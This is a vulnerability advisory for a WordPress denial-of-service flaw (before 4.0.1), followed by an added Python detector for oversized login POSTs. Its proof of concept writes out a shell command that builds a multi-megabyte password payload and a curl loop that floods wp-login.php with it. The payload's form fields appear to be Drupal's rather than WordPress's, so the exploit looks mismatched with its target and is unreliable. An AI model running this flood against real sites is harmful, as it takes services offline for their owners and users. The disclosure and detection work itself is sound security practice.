====================================================================
DESCRIPTION:
====================================================================

A vulnerability present in WordPress < 4.0.1 allows an attacker to
send specially crafted requests resulting in CPU and memory
exhaustion. This may lead to the site becoming unavailable or
unresponsive (denial of service).

====================================================================
Time Line:
====================================================================

November 20, 2014 - A WordPress security update and the security
advisory are published.

====================================================================
Proof of Concept:
====================================================================

Generate a payload and try with a valid user:

echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload

Perform a DoS with a valid user:

for i in $(seq 1 150); do (curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done

====================================================================
Authors:
====================================================================

-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info

====================================================================
References:
====================================================================

* https://wordpress.org/news/2014/11/wordpress-4-0-1/
* https://www.drupal.org/SA-CORE-2014-006
* http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
* http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
* http://www.devconsole.info/?p=1050
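Detection example added here, not part of the original advisory: the proof of concept posts a multi-megabyte body to wp-login.php many times in quick succession, so repeated oversized login POSTs from one client are a usable signal. The log format (timestamp, client, method, path, request bytes), the 8 KiB size cap, the window and the threshold are assumptions, and the sample lines are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/wp-login.php"
MAX_LOGIN_BODY = 8 * 1024        # assumption: a genuine login form body is far smaller
WINDOW = timedelta(seconds=10)   # assumption: sliding window per client
THRESHOLD = 5                    # assumption: oversized login POSTs tolerated per window


def parse_line(line):
    """Parse 'ISO-timestamp client method path request_bytes' (assumed log format)."""
    parts = line.split()
    if len(parts) != 5:
        return None
    try:
        return (datetime.fromisoformat(parts[0]), parts[1], parts[2],
                parts[3], int(parts[4]))
    except ValueError:
        return None


def oversized_login_alerts(lines):
    """Map client -> time it first hit THRESHOLD oversized login POSTs within WINDOW.

    Expects lines in chronological order; malformed lines are skipped.
    """
    recent = defaultdict(deque)
    alerts = {}
    for rec in filter(None, map(parse_line, lines)):
        ts, client, method, path, size = rec
        if method != "POST" or path.split("?", 1)[0] != LOGIN_PATH:
            continue
        if size <= MAX_LOGIN_BODY:
            continue
        q = recent[client]
        q.append(ts)
        while ts - q[0] > WINDOW:   # drop hits that fell out of the window
            q.popleft()
        if len(q) >= THRESHOLD:
            alerts.setdefault(client, ts)
    return alerts


def build_sample():
    """Constructed log: one client repeating a large POST, one normal login, one bad line."""
    base = datetime(2014, 11, 20, 12, 0, 0)
    lines = [f"{(base + timedelta(milliseconds=250 * i)).isoformat()} "
             f"203.0.113.7 POST /wp-login.php 5900000" for i in range(8)]
    lines.append(f"{(base + timedelta(seconds=3)).isoformat()} 198.51.100.4 POST /wp-login.php 96")
    lines.append("malformed line")
    return lines
```

The same size cap can be enforced at the reverse proxy or web server for the login endpoint, so oversized bodies are rejected before they reach PHP.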